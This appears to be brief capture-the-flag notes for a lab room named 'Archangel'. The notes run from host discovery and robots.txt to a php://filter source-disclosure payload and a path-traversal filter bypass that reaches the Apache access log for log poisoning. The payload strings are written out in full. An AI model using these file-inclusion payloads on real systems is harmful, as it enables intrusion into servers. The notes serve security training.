Easy
Table of Contents¶
Rooms¶
ARcHanG3l¶
[!bug] Apache Log Poisoning
- in header on target IP we get new domain from: "Send us a mail: support@mafialive.thm"
- add it to
/etc/hostsand get a flag http://mafialive.thm/FUZZ->robots.txtwith: Disallow: /test.php- use a PHP wrapper filter for source code disclosure
/test.php?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/test.php- Bypass Non-Recursive Path Traversal Filter -
if(!containsStr($_GET['view'], '../..')->/.././.././.././log/apache2/access.log-